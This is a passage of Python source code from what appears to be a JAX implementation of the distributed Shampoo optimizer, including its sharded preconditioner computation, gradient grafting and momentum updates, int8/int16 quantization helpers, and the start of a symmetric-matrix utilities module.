treedef.flatten_up_to(state.stats.local_stats) stats_flat = [ _convert_to_parameter_stats(global_stats, local_stat) for local_stat in local_stats_flat ] new_stats_flat = jax.tree_map( lambda g, s, p: _compute_stats(g, s, p, state.count), grads_flat, stats_flat, params_flat, ) outputs = jax.tree_map( lambda g, s, p: _transform_grad(g, s, p, state.count), grads_flat, new_stats_flat, params_flat, ) updates_flat, new_stats_flat = list(zip(*outputs)) if outputs else ((), ()) updates = jax.tree_unflatten(treedef, updates_flat) # Create new local_stats new_local_stats_flat = [ _convert_from_parameter_stats(new_stat, local_stat) for new_stat, local_stat in zip(new_stats_flat, local_stats_flat) ] max_size = global_stats.statistics.shape[1] new_padded_statistics = [] for stat in new_stats_flat: new_padded_statistics.extend( [pad_square_matrix(stat, max_size) for stat in stat.statistics] ) # Create global stats # TODO(rohananil): Preconditioner is not updated every step, so cost of # stack/pad can be obviated away. # Pad the statistics and preconditioner matrices to be a multiple of # num devices. # TODO(rohananil): Relax to only the size of the mesh axis where the dim # is split on. to_pad = -len(new_padded_statistics) % num_devices_for_pjit if not new_padded_statistics: to_pad = num_devices_for_pjit stat_dtype = jnp.float32 else: stat_dtype = new_padded_statistics[0].dtype new_padded_statistics.extend( [jnp.eye(max_size, dtype=stat_dtype) for _ in range(to_pad)] ) new_stacked_padded_statistics = jnp.stack(new_padded_statistics) new_stacked_padded_statistics = pjit.with_sharding_constraint( new_stacked_padded_statistics, statistics_partition_spec ) def _internal_inverse_pth_root_all(): preconditioners, errors = _matrix_inverse_pth_root_pjit( new_stacked_padded_statistics, global_stats.exponents, statistics_partition_spec, ) return preconditioners, errors if preconditioning_compute_steps == 1: new_preconditioners, errors = _internal_inverse_pth_root_all() else: # Passing statistics instead of preconditioners as they are similarly # shaped tensors. Note statistics will be ignored as we are passing in # a large init value for error. preconditioners_init = new_stacked_padded_statistics n = new_stacked_padded_statistics.shape[0] errors_init = jnp.ones([n], jnp.float32) * inverse_failure_threshold init_state = [preconditioners_init, errors_init] perform_step = state.count % preconditioning_compute_steps == 0 new_preconditioners, errors = efficient_cond( perform_step, _internal_inverse_pth_root_all, init_state ) new_local_stats_flat = _add_error_into_local_stats( new_local_stats_flat, errors, inverse_failure_threshold ) new_local_stats = jax.tree_unflatten(treedef, new_local_stats_flat) errors = errors.reshape((-1, 1, 1)) predicate = jnp.logical_or( jnp.isnan(errors), errors >= inverse_failure_threshold ).astype(new_preconditioners.dtype) # TODO(rohananil): Check for numerical instabilities. new_conditional_preconditioners = ( predicate * global_stats.preconditioners + (1.0 - predicate) * new_preconditioners ) new_global_stats = GlobalShardedParameterStats( new_stacked_padded_statistics, new_conditional_preconditioners, global_stats.exponents, ) new_shampoo_state = ShampooState( count=state.count + 1, stats=ShardedShampooStats(new_global_stats, new_local_stats), ) return updates, new_shampoo_state def init_fn(params): """Initialise the optimiser's state.""" def _init(param): preconditioner = preconditioner_from_params(param) statistics = [] preconditioners = [] if not _skip_preconditioning(param): shapes = preconditioner.shapes_for_preconditioners() statistics = [ matrix_epsilon * jnp.eye(s[0], dtype=jnp.float32) for s in shapes ] preconditioners = [jnp.eye(s[0], dtype=jnp.float32) for s in shapes] diagonal_statistics = [] if _graft_type_has_diagonal_statistics(): diagonal_statistics = jnp.zeros_like(param) diagonal_momentum = _quantize_momentum(jnp.zeros_like(param)) momentum = _quantize_momentum(jnp.zeros_like(param)) return ParameterStats( _quantize_diagonal_statistics(diagonal_statistics), _maybe_quantize_statistics(statistics), _maybe_quantize_preconditioners(preconditioners), diagonal_momentum, momentum, init_training_metrics(len(statistics)), ) return ShampooState( count=jnp.zeros([], jnp.int32), stats=jax.tree_map(_init, params) ) def _skip_preconditioning(param): return len(param.shape) < skip_preconditioning_rank_lt or any( [s > skip_preconditioning_dim_size_gt for s in param.shape] ) def _compute_stats(grad, state, param, step): """Compute per-parameter statistics.""" preconditioner = preconditioner_from_params(param) new_statistics = [[]] * len(state.statistics) w1 = beta2 w2 = beta2 if beta2 == 1.0 else (1.0 - beta2) if not _skip_preconditioning(param): def compute_updated_statistics(): return preconditioner.updated_statistics_from_grad( state.statistics, grad, w1=w1, w2=w2, to_float=_to_float, from_float=lambda x: _maybe_quantize_statistics([x])[0], precision=tensordot_precision, ) if statistics_compute_steps > 1: perform_step = step % statistics_compute_steps == 0 init_state = state.statistics new_statistics = list( efficient_cond(perform_step, compute_updated_statistics, init_state) ) else: new_statistics = compute_updated_statistics() return ParameterStats( state.diagonal_statistics, new_statistics, state.preconditioners, state.diagonal_momentum, state.momentum, state.training_metrics, ) mi_pth_root = functools.partial( matrix_inverse_pth_root, ridge_epsilon=matrix_epsilon, precision=precision, relative_matrix_epsilon=relative_matrix_epsilon, lobpcg_topk_precondition=lobpcg_topk_precondition, lobpcg_max_iter=lobpcg_max_iter, ) def _matrix_inverse_pth_root_vmap(xs, ps): return jax.vmap(mi_pth_root)(xs, ps) def _quantized_matrix_inverse_pth_root_vmap(qxs, qds, qbs, ps): def _quantized_to_float(qx, qd, qb): qv = QuantizedValue(qx, qd, qb, qx.dtype, True, list(qx.shape)) return qv.to_float() def matrix_inverse_pth_root_wrapper(qx, qd, qb, p): v = _quantized_to_float(qx, qd, qb) preconditioner, error = mi_pth_root(v, p) qp = QuantizedValue.from_float_value(preconditioner, qx.dtype, True) return qp.quantized, qp.diagonal, qp.bucket_size, error return jax.vmap(matrix_inverse_pth_root_wrapper)(qxs, qds, qbs, ps) def _matrix_inverse_pth_root_pjit(xs, ps, statistics_partition_spec=None): # Partition the concatenated statistics matrix across all cores. pspec_for_partition = preconditioner_partition_spec partitioned_xs = pjit.with_sharding_constraint(xs, pspec_for_partition) if preconditioner_partition_spec: partitioned_ps_spec = pjit.PartitionSpec(preconditioner_partition_spec[0]) else: partitioned_ps_spec = None partitioned_ps = pjit.with_sharding_constraint(ps, partitioned_ps_spec) # Run matrix inverse pth root on each shard. partitioned_preconditioners, partitioned_errors = _matrix_inverse_pth_root_vmap( partitioned_xs, partitioned_ps ) # Reshard output to have the same PSpec as input. This is required to avoid # vmap seeing the full set of statistics. partitioned_preconditioners = pjit.with_sharding_constraint( partitioned_preconditioners, pspec_for_partition ) # Recombine the outputs at each core. preconditioners = pjit.with_sharding_constraint( partitioned_preconditioners, statistics_partition_spec ) errors = pjit.with_sharding_constraint(partitioned_errors, pjit.PartitionSpec()) return preconditioners, errors def _pmap_compute_preconditioners( states, step, statistics, num_statistics_per_state, original_shapes, exponents, max_size, prev_preconditioners, ): """Computes preconditioners for given statistics in states in PMAP mode. Args: states: A list of optimizer states. step: Current step number statistics: A list of statistics for all variables (for every dim) num_statistics_per_state: Number of statistis per state to reconstruct output states. original_shapes: A list of shapes of the statistics. exponents: Exponent power to use for inverse-pth roots. max_size: Maximum dim of the statistics to pad. prev_preconditioners: Previously available preconditioner. Returns: New optimizer states after computing the preconditioner. """ if batch_axis_name: num_devices = lax.psum(1, batch_axis_name) else: num_devices = 1 num_statistics = len(statistics) # Pad statistics and exponents to next multiple of num_devices. packed_statistics = [pad_square_matrix(stat, max_size) for stat in statistics] to_pad = -num_statistics % num_devices packed_statistics.extend( [jnp.eye(max_size, dtype=packed_statistics[0].dtype) for _ in range(to_pad)] ) exponents.extend([1 for _ in range(to_pad)]) if not packed_statistics: return states all_statistics = batch(packed_statistics, num_devices) all_exponents = batch(exponents, num_devices) def _internal_inverse_pth_root_all(): if batch_axis_name: current_replica = lax.axis_index(batch_axis_name) preconditioners, errors = _matrix_inverse_pth_root_vmap( all_statistics[current_replica], all_exponents[current_replica] ) preconditioners = jax.lax.all_gather(preconditioners, batch_axis_name) errors = jax.lax.all_gather(errors, batch_axis_name) preconditioners_flat = unbatch(preconditioners) errors_flat = unbatch(errors) else: preconditioners, errors = _matrix_inverse_pth_root_vmap( all_statistics[0], all_exponents[0] ) preconditioners_flat = unbatch(jnp.stack([preconditioners])) errors_flat = unbatch(jnp.stack([errors])) return preconditioners_flat, errors_flat if preconditioning_compute_steps == 1: preconditioners_flat, errors_flat = _internal_inverse_pth_root_all() else: # Passing statistics instead of preconditioners as they are similarly # shaped tensors. Note statistics will be ignored as we are passing in # a large init value for error. preconditioners_init = packed_statistics errors_init = [inverse_failure_threshold] * len(packed_statistics) init_state = [preconditioners_init, errors_init] perform_step = step % preconditioning_compute_steps == 0 preconditioners_flat, errors_flat = efficient_cond( perform_step, _internal_inverse_pth_root_all, init_state ) def _skip(error): condition = jnp.logical_or( jnp.isnan(error), error >= inverse_failure_threshold ) return condition.astype(error.dtype) def _select_preconditioner(error, new_p, old_p): return lax.cond( _skip(error), lambda _: old_p, lambda _: new_p, operand=None ) new_preconditioners_flat = [] new_errors_flat = [] for p, shape, prev_p, error in zip( preconditioners_flat, original_shapes, prev_preconditioners, errors_flat ): new_preconditioners_flat.append( _select_preconditioner(error, p[: shape[0], : shape[1]], prev_p) ) new_errors_flat.append(error) assert len(states) == len(num_statistics_per_state) assert len(new_preconditioners_flat) == num_statistics assert len(new_errors_flat) == num_statistics # Add back empty preconditioners so we that we can set the optimizer state. preconditioners_for_states = [] idx = 0 errors_for_states = [] for num_statistics, state in zip(num_statistics_per_state, states): if num_statistics == 0: preconditioners_for_states.append([]) errors_for_states.append(jnp.array(0, jnp.float32)) else: preconditioners_for_state = new_preconditioners_flat[ idx : idx + num_statistics ] assert len(state.statistics) == len(preconditioners_for_state) preconditioners_for_states.append(preconditioners_for_state) errors_for_state = jnp.stack( new_errors_flat[idx : idx + num_statistics] ) assert len(state.statistics) == len(errors_for_state) errors_for_states.append(errors_for_state) idx += num_statistics new_states = [] for state, new_preconditioners, new_errors in zip( states, preconditioners_for_states, errors_for_states ): if state.statistics: new_errors = jnp.where( jnp.logical_and( new_errors > 0.0, new_errors != inverse_failure_threshold ), new_errors, state.training_metrics.inverse_pth_root_errors, ) new_training_metrics = TrainingMetrics(new_errors) new_states.append( ParameterStats( state.diagonal_statistics, state.statistics, new_preconditioners, state.diagonal_momentum, state.momentum, new_training_metrics, ) ) return new_states def _pmap_quantized_compute_preconditioners( states, step, statistics, num_statistics_per_state, original_shapes, exponents, max_size, prev_preconditioners, ): """Computes preconditioners for given statistics in states in PMAP mode. For quantization, each statistic is represented by three values: quantized matrix, diagonal, and bucket sizes, we run inverse pth-roots without ever recreating the original matrix in f32. Args: states: A list of optimizer states. step: Current step number statistics: A list of statistics for all variables (for every dim) num_statistics_per_state: Number of statistis per state to reconstruct output states. original_shapes: A list of shapes of the statistics. exponents: Exponent power to use for inverse-pth roots. max_size: Maximum dim of the statistics to pad. prev_preconditioners: Previously available preconditioner. Returns: New optimizer states after computing the preconditioner. """ num_devices = lax.psum(1, batch_axis_name) num_statistics = len(statistics) quantized_dtype = quantized_dtype_for_second_moment_statistics_buffers() # Complexity here is around: shapes needing be statically shaped, # our custom quantization type requires a different type of packing. # Parallel tensors: # quantized [dxd] # diagonals [d] f32 # bucket_sizes [d] f32 packed_quantized_statistics = [ pad_square_matrix(stat.quantized, max_size) for stat in statistics ] packed_quantized_diagonals = [ pad_vector(stat.diagonal, max_size) for stat in statistics ] packed_quantized_bucket_sizes = [ pad_vector(stat.bucket_size, max_size) for stat in statistics ] to_pad = -num_statistics % num_devices padded_eye = jnp.eye(max_size, dtype=jnp.float32) quantized_eye = QuantizedValue.from_float_value( padded_eye, quantized_dtype, True ) packed_quantized_statistics.extend( [quantized_eye.quantized for _ in range(to_pad)] ) packed_quantized_diagonals.extend( [quantized_eye.diagonal for _ in range(to_pad)] ) packed_quantized_bucket_sizes.extend( [quantized_eye.bucket_size for _ in range(to_pad)] ) exponents.extend([1 for _ in range(to_pad)]) if not packed_quantized_statistics: return states all_quantized_statistics = batch(packed_quantized_statistics, num_devices) all_quantized_diagonals = batch(packed_quantized_diagonals, num_devices) all_quantized_bucket_sizes = batch(packed_quantized_bucket_sizes, num_devices) all_exponents = batch(exponents, num_devices) def _internal_inverse_pth_root_all(): current_replica = lax.axis_index(batch_axis_name) ( quantized_preconditioners, quantized_diagonals, quantized_bucket_sizes, errors, ) = _quantized_matrix_inverse_pth_root_vmap( all_quantized_statistics[current_replica], all_quantized_diagonals[current_replica], all_quantized_bucket_sizes[current_replica], all_exponents[current_replica], ) quantized_preconditioners = jax.lax.all_gather( quantized_preconditioners, batch_axis_name ) quantized_diagonals = jax.lax.all_gather( quantized_diagonals, batch_axis_name ) quantized_bucket_sizes = jax.lax.all_gather( quantized_bucket_sizes, batch_axis_name ) errors = jax.lax.all_gather(errors, batch_axis_name) quantized_preconditioners_flat = unbatch(quantized_preconditioners) quantized_diagonals_flat = unbatch(quantized_diagonals) quantized_bucket_sizes_flat = unbatch(quantized_bucket_sizes) errors_flat = unbatch(errors) return ( quantized_preconditioners_flat, quantized_diagonals_flat, quantized_bucket_sizes_flat, errors_flat, ) if preconditioning_compute_steps == 1: ( quantized_preconditioners_flat, quantized_diagonals_flat, quantized_bucket_sizes_flat, errors_flat, ) = _internal_inverse_pth_root_all() else: # Passing statistics instead of preconditioners as they are similarly # shaped tensors. Note statistics will be ignored as we are passing in # a large init value for error. quantized_preconditioners_init = packed_quantized_statistics quantized_diagonals_init = packed_quantized_diagonals quantized_bucket_sizes_init = packed_quantized_bucket_sizes errors_init = [inverse_failure_threshold] * len( quantized_preconditioners_init ) init_state = [ quantized_preconditioners_init, quantized_diagonals_init, quantized_bucket_sizes_init, errors_init, ] perform_step = step % preconditioning_compute_steps == 0 ( quantized_preconditioners_flat, quantized_diagonals_flat, quantized_bucket_sizes_flat, errors_flat, ) = efficient_cond(perform_step, _internal_inverse_pth_root_all, init_state) def _skip(error): condition = jnp.logical_or( jnp.isnan(error), error >= inverse_failure_threshold ) return condition.astype(error.dtype) def _select_preconditioner(error, new_p, old_p): return lax.cond( _skip(error), lambda _: old_p, lambda _: new_p, operand=None ) new_quantized_preconditioners_flat = [] new_quantized_diagonals_flat = [] new_quantized_bucket_sizes_flat = [] new_errors_flat = [] for p, d, b, shape, prev_p, error in zip( quantized_preconditioners_flat, quantized_diagonals_flat, quantized_bucket_sizes_flat, original_shapes, prev_preconditioners, errors_flat, ): new_quantized_preconditioners_flat.append( _select_preconditioner( error, p[: shape[0], : shape[1]], prev_p.quantized ) ) new_quantized_diagonals_flat.append( _select_preconditioner(error, d[: shape[0]], prev_p.diagonal) ) new_quantized_bucket_sizes_flat.append( _select_preconditioner(error, b[: shape[0]], prev_p.bucket_size) ) new_errors_flat.append(error) assert len(states) == len(num_statistics_per_state) assert len(new_quantized_preconditioners_flat) == num_statistics assert len(new_quantized_diagonals_flat) == num_statistics assert len(new_quantized_bucket_sizes_flat) == num_statistics # Add back empty preconditioners so we that we can set the optimizer state. preconditioners_for_states = [] errors_for_states = [] idx = 0 for num_statistics, state in zip(num_statistics_per_state, states): if num_statistics == 0: preconditioners_for_states.append([]) errors_for_states.append(jnp.array(0, jnp.float32)) else: quantized_preconditioners_for_state = ( new_quantized_preconditioners_flat[idx : idx + num_statistics] ) quantized_diagonals_for_state = new_quantized_diagonals_flat[ idx : idx + num_statistics ] quantized_bucket_sizes_for_state = new_quantized_bucket_sizes_flat[ idx : idx + num_statistics ] errors_for_state = jnp.stack( new_errors_flat[idx : idx + num_statistics] ) assert len(state.statistics) == len(quantized_preconditioners_for_state) assert len(state.statistics) == len(quantized_diagonals_for_state) assert len(state.statistics) == len(quantized_bucket_sizes_for_state) assert len(state.statistics) == len(errors_for_state) quantized_preconditioners = [] for qv, qd, qb in zip( quantized_preconditioners_for_state, quantized_diagonals_for_state, quantized_bucket_sizes_for_state, ): quantized_preconditioners.append( QuantizedValue(qv, qd, qb, qv.dtype, True, list(qv.shape)) ) preconditioners_for_states.append(quantized_preconditioners) errors_for_states.append(errors_for_state) idx += num_statistics new_states = [] for state, new_preconditioners, new_errors in zip( states, preconditioners_for_states, errors_for_states ): if state.statistics: new_errors = jnp.where( jnp.logical_and( new_errors > 0.0, new_errors != inverse_failure_threshold ), new_errors, state.training_metrics.inverse_pth_root_errors, ) new_training_metrics = TrainingMetrics(new_errors) new_states.append( ParameterStats( state.diagonal_statistics, state.statistics, new_preconditioners, state.diagonal_momentum, state.momentum, new_training_metrics, ) ) return new_states def _pjit_compute_preconditioners( states, step, statistics, num_statistics_per_state, original_shapes, exponents, max_size, prev_preconditioners, ): """Computes preconditioners for given statistics in states in PJIT mode. Args: states: A list of optimizer states. step: Current step number statistics: A list of statistics for all variables (for every dim) num_statistics_per_state: Number of statistis per state to reconstruct output states. original_shapes: A list of shapes of the statistics. exponents: Exponent power to use for inverse-pth roots. max_size: Maximum dim of the statistics to pad. prev_preconditioners: Previously available preconditioner. Returns: New optimizer states after computing the preconditioner. """ num_statistics = len(statistics) to_pad = -num_statistics % num_devices_for_pjit padded_statistics = [pad_square_matrix(stat, max_size) for stat in statistics] padded_statistics.extend( [jnp.eye(max_size, dtype=padded_statistics[0].dtype) for _ in range(to_pad)] ) exponents.extend([1 for _ in range(to_pad)]) all_statistics = jnp.stack(padded_statistics) all_exponents = jnp.stack(exponents) def _internal_inverse_pth_root_all(): preconditioners, errors = _matrix_inverse_pth_root_pjit( all_statistics, all_exponents ) b1 = preconditioners.shape[0] def split(batched_values): return [ jnp.squeeze(v) for v in jnp.split(batched_values, indices_or_sections=b1, axis=0) ] return split(preconditioners), split(errors) if preconditioning_compute_steps == 1: preconditioners_flat, errors_flat = _internal_inverse_pth_root_all() else: # Passing statistics instead of preconditioners as they are similarly # shaped tensors. Note statistics will be ignored as we are passing in # a large init value for error. preconditioners_init = padded_statistics errors_init = [inverse_failure_threshold] * len(padded_statistics) init_state = [preconditioners_init, errors_init] perform_step = step % preconditioning_compute_steps == 0 preconditioners_flat, errors_flat = efficient_cond( perform_step, _internal_inverse_pth_root_all, init_state ) def _skip(error): condition = jnp.logical_or( jnp.isnan(error), error >= inverse_failure_threshold ) return condition.astype(error.dtype) def _select_preconditioner(error, new_p, old_p): return lax.cond( _skip(error), lambda _: old_p, lambda _: new_p, operand=None ) new_preconditioners_flat = [] new_errors_flat = [] for p, shape, prev_p, error in zip( preconditioners_flat, original_shapes, prev_preconditioners, errors_flat ): new_preconditioners_flat.append( _select_preconditioner(error, p[: shape[0], : shape[1]], prev_p) ) new_errors_flat.append(error) assert len(states) == len(num_statistics_per_state) assert len(new_preconditioners_flat) == num_statistics # Add back empty preconditioners so we that we can set the optimizer state. preconditioners_for_states = [] errors_for_states = [] idx = 0 for num_statistics, state in zip(num_statistics_per_state, states): if num_statistics == 0: preconditioners_for_states.append([]) errors_for_states.append(jnp.array(0, jnp.float32)) else: preconditioners_for_state = new_preconditioners_flat[ idx : idx + num_statistics ] assert len(state.statistics) == len(preconditioners_for_state) preconditioners_for_states.append(preconditioners_for_state) errors_for_state = jnp.stack( new_errors_flat[idx : idx + num_statistics] ) assert len(state.statistics) == len(errors_for_state) errors_for_states.append(errors_for_state) idx += num_statistics new_states = [] for state, new_preconditioners, new_errors in zip( states, preconditioners_for_states, errors_for_states ): if state.statistics: new_errors = jnp.where( jnp.logical_and( new_errors > 0.0, new_errors != inverse_failure_threshold ), new_errors, state.training_metrics.inverse_pth_root_errors, ) new_training_metrics = TrainingMetrics(new_errors) new_states.append( ParameterStats( state.diagonal_statistics, state.statistics, new_preconditioners, state.diagonal_momentum, state.momentum, new_training_metrics, ) ) return new_states def _compute_preconditioners(states, params, step): """Computes preconditioners for given statistics in states. Args: states: A list of optimizer states. params: A list of params. step: Current step number Returns: New optimizer states after computing the preconditioner. """ statistics = [] num_statistics_per_state = [] original_shapes = [] exponents = [] max_size = 0 prev_preconditioners = [] for state, param in zip(states, params): num_statistics = len(state.statistics) num_statistics_per_state.append(num_statistics) original_shapes_for_state = [] if num_statistics > 0: preconditioner = preconditioner_from_params(param) for statistic in state.statistics: exponents.append( preconditioner.exponent_for_preconditioner() if exponent_override == 0 else exponent_override ) original_shapes_for_state.append(statistic.shape) max_size = max(max_size, statistic.shape[0]) statistics.extend(state.statistics) prev_preconditioners.extend(state.preconditioners) original_shapes.extend(original_shapes_for_state) if not shard_optimizer_states: # Quantization is only enabled if batch_axis_name is not set. quantized_dtype = quantized_dtype_for_second_moment_statistics_buffers() if quantized_dtype == jnp.float32: return _pmap_compute_preconditioners( states, step, statistics, num_statistics_per_state, original_shapes, exponents, max_size, prev_preconditioners, ) else: return _pmap_quantized_compute_preconditioners( states, step, statistics, num_statistics_per_state, original_shapes, exponents, max_size, prev_preconditioners, ) else: return _pjit_compute_preconditioners( states, step, statistics, num_statistics_per_state, original_shapes, exponents, max_size, prev_preconditioners, ) def _transform_grad(grad, state, param, step): """Transform per-parameter gradients.""" preconditioner = preconditioner_from_params(param) sgd_update = grad new_diagonal_statistics = state.diagonal_statistics.to_float() if ( graft_type == GraftingType.ADAGRAD or graft_type == GraftingType.ADAGRAD_NORMALIZED ): scaled_grad = grad if graft_type == GraftingType.ADAGRAD_NORMALIZED: scaled_grad = grad / (jnp.linalg.norm(grad) + 1e-16) new_diagonal_statistics = state.diagonal_statistics.to_float() + jnp.square( scaled_grad ) adagrad_update = scaled_grad / ( jnp.sqrt(new_diagonal_statistics) + diagonal_epsilon ) grafting_update = adagrad_update elif ( graft_type == GraftingType.RMSPROP or graft_type == GraftingType.RMSPROP_NORMALIZED ): scaled_grad = grad if graft_type == GraftingType.RMSPROP_NORMALIZED: scaled_grad = grad / (jnp.linalg.norm(grad) + 1e-16) w1 = beta2 w2 = beta2 if beta2 == 1.0 else (1.0 - beta2) new_diagonal_statistics = ( w1 * state.diagonal_statistics.to_float() + w2 * jnp.square(scaled_grad) ) rmsprop_update = scaled_grad / ( jnp.sqrt(new_diagonal_statistics) + diagonal_epsilon ) if clip_by_scaled_gradient_norm: scaled_grad_norm = jnp.linalg.norm(rmsprop_update) / ( jnp.sqrt(float(rmsprop_update.size)) ) clipping_denom = jnp.maximum( 1.0, scaled_grad_norm / clip_by_scaled_gradient_norm ) rmsprop_update /= clipping_denom grafting_update = rmsprop_update elif graft_type == GraftingType.SGD: grafting_update = sgd_update else: grafting_update = jnp.ones_like(sgd_update) * jnp.sign(sgd_update) lr = learning_rate if callable(learning_rate): lr = learning_rate(step) preconditioner_multiplier = lr if not decoupled_learning_rate else 1.0 grafting_update = grafting_update * preconditioner_multiplier precond_grad = grad if not _skip_preconditioning(param): precond_grad = preconditioner.preconditioned_grad( precond_grad, _maybe_dequantize_preconditioners(state.preconditioners) ) else: precond_grad = grafting_update grafting_update_norm = jnp.linalg.norm(grafting_update) precond_grad_norm = jnp.linalg.norm(precond_grad) multiplier = grafting_update_norm / (precond_grad_norm + 1e-16) shampoo_update = precond_grad * multiplier shampoo_update_with_wd = shampoo_update grafting_update_with_wd = grafting_update if weight_decay != 0 and not decoupled_weight_decay: shampoo_update_with_wd = shampoo_update + weight_decay * param grafting_update_with_wd = grafting_update + weight_decay * param w = (1.0 - beta1) if moving_average_for_momentum else 1.0 shampoo_update_with_wd_momentum = ( state.momentum.to_float() * beta1 + w * shampoo_update_with_wd ) grafting_update_with_wd_momentum = ( state.diagonal_momentum.to_float() * beta1 + w * grafting_update_with_wd ) run_shampoo = (step >= start_preconditioning_step).astype( grafting_update_with_wd_momentum.dtype ) momentum_update = ( run_shampoo * shampoo_update_with_wd_momentum + (1.0 - run_shampoo) * grafting_update_with_wd_momentum ) wd_update = ( run_shampoo * shampoo_update_with_wd + (1.0 - run_shampoo) * grafting_update_with_wd ) nesterov_momentum_update = momentum_update if nesterov: nesterov_momentum_update = w * wd_update + beta1 * momentum_update if weight_decay != 0 and decoupled_weight_decay: nesterov_momentum_update = ( nesterov_momentum_update + lr * weight_decay * param ) momentum_multiplier = lr if decoupled_learning_rate else 1.0 transformed_update = -1.0 * momentum_multiplier * nesterov_momentum_update new_diagonal_momentum = grafting_update_with_wd_momentum new_momentum = shampoo_update_with_wd_momentum param_stats = ParameterStats( _quantize_diagonal_statistics(new_diagonal_statistics), state.statistics, state.preconditioners, _quantize_momentum(new_diagonal_momentum), _quantize_momentum(new_momentum), state.training_metrics, ) return transformed_update, param_stats def update_fn(grads, state, params): """Transform the input gradient and update all statistics. Args: grads: the gradient tensors for the parameters and any custom gradients for preconditioners. state: a named tuple containing the state of the optimizer params: the parameters that should be updated. Returns: A tuple containing the new parameters and the new optimizer state. """ params_flat, treedef = jax.tree_flatten(params) stats_flat = treedef.flatten_up_to(state.stats) grads_flat = treedef.flatten_up_to(grads) stats_grads = grads_flat new_stats_flat = jax.tree_map( lambda g, s, p: _compute_stats(g, s, p, state.count), stats_grads, stats_flat, params_flat, ) new_stats_flat = _compute_preconditioners( new_stats_flat, params_flat, state.count ) outputs = jax.tree_map( lambda g, s, p: _transform_grad(g, s, p, state.count), grads_flat, new_stats_flat, params_flat, ) updates_flat, new_stats_flat = list(zip(*outputs)) if outputs else ((), ()) updates = jax.tree_unflatten(treedef, updates_flat) new_stats = jax.tree_unflatten(treedef, new_stats_flat) new_state = ShampooState(count=state.count + 1, stats=new_stats) return updates, new_state if shard_optimizer_states: # Hijacks the init_fn signature so we can return an OptState with # appropriate init_fns. opt_init_fn = sharded_init_fn def _init_fns(unused_params): return InitFnState( init_fn=opt_init_fn, pspec_fn=sharded_init_partition_spec_fn, shape_and_dtype_fn=sharded_init_shape_and_dtype_fn, ) opt_update_fn = sharded_update_fn return optax.GradientTransformation(_init_fns, opt_update_fn) else: return optax.GradientTransformation(init_fn, update_fn) File: tools/train/scalable_shampoo/quantization_utils.py # coding=utf-8 # Copyright 2022 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Helper routines for quantization.""" from typing import Any import chex import jax.numpy as jnp from flax import struct # pylint:disable=no-value-for-parameter @struct.dataclass class QuantizedValue: """State associated with quantized value.""" quantized: chex.Array diagonal: chex.Array # Diagonal (if extract_diagonal is set) bucket_size: chex.Array quantized_dtype: jnp.dtype = struct.field( pytree_node=False ) # Dtype for the quantized value. extract_diagonal: bool = struct.field(pytree_node=False) # In case its centered. shape: Any = struct.field(pytree_node=False) # Shape of the tensor. @classmethod def from_float_value(cls, fvalue, quantized_dtype, extract_diagonal=False): if isinstance(fvalue, list) and not fvalue: return QuantizedValue([], [], [], quantized_dtype, extract_diagonal, []) quantized, diagonal_fvalue, bucket_size = QuantizedValue.quantize( fvalue, quantized_dtype, extract_diagonal ) return QuantizedValue( quantized, diagonal_fvalue, bucket_size, quantized_dtype, extract_diagonal, list(quantized.shape), ) # Quantization is from Lingvo JAX optimizers. # We extend it for int16 quantization of PSD matrices. @classmethod def quantize(cls, fvalue, quantized_dtype, extract_diagonal=False): """Returns quantized value and the bucket.""" if quantized_dtype == jnp.float32: return fvalue, [], [] elif quantized_dtype == jnp.bfloat16: return fvalue.astype(jnp.bfloat16), [], [] float_dtype = fvalue.dtype if quantized_dtype == jnp.int8: # value -128 is not used. num_buckets = jnp.array(127.0, dtype=float_dtype) elif quantized_dtype == jnp.int16: # value -32768 is not used. num_buckets = jnp.array(32767.0, dtype=float_dtype) else: raise ValueError(f"Quantized dtype {quantized_dtype} not supported.") # max value is mapped to num_buckets if extract_diagonal and fvalue.ndim != 2: raise ValueError( f"Input array {fvalue} must be 2D to work with extract_diagonal." ) diagonal_fvalue = [] if extract_diagonal: diagonal_fvalue = jnp.diag(fvalue) # Remove the diagonal entries. fvalue = fvalue - jnp.diag(diagonal_fvalue) # TODO(rohananil): Extend this by making use of information about the blocks # SM3 style which will be useful for diagonal statistics # We first decide the scale. if fvalue.ndim < 1: raise ValueError( f"Input array {fvalue} must have a strictly positive number of dimensions." ) max_abs = jnp.max(jnp.abs(fvalue), axis=0) bucket_size = max_abs / num_buckets bs_expanded = bucket_size[jnp.newaxis, Ellipsis] # To avoid divide by 0.0 bs_nonzero = jnp.where( bs_expanded > 0.0, bs_expanded, jnp.ones_like(bs_expanded) ) ratio = fvalue / bs_nonzero # We use rounding to remove bias. quantized = jnp.round(ratio) return quantized.astype(quantized_dtype), diagonal_fvalue, bucket_size def to_float(self): """Returns the float value.""" if isinstance(self.quantized, list) and not self.quantized: return self.quantized if self.quantized_dtype == jnp.float32: return self.quantized if self.quantized_dtype == jnp.bfloat16: return self.quantized.astype(jnp.float32) float_dtype = self.bucket_size.dtype bucket_size = self.bucket_size[jnp.newaxis, Ellipsis] val = self.quantized.astype(float_dtype) * bucket_size if self.extract_diagonal: val += jnp.diag(self.diagonal) return val File: tools/train/scalable_shampoo/symmetric_matrices/symmetric_matrices.py # coding=utf-8 # Copyright 2022 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """JAX Ops for symmetric matrices used by the Shampoo optimizer.""" import functools from typing import Any, List, Optional, Sequence, Union import jax import jax.numpy as jnp import numpy as np from flax import struct from jax import lax @struct.dataclass class SlicedSymmetricMatrix: """A symmetric matrix represented by lower-triangular block row slices. For example, the symmetric matrix M = [[a, b^T], [b, c]] would be represented by the block rows a and [b, c]. The matrix may be batched, in which case each entry of block_rows may have dimension greater than 2. The last two dimensions represent the rows and cols. """ block_rows: List[jnp.ndarray] def product_with_transpose( mat1, mat2, axes, precision=lax.Precision.DEFAULT, ): """Returns mat1 * mat2^T for two matrices (possibly batched). The rows and columns are the last two 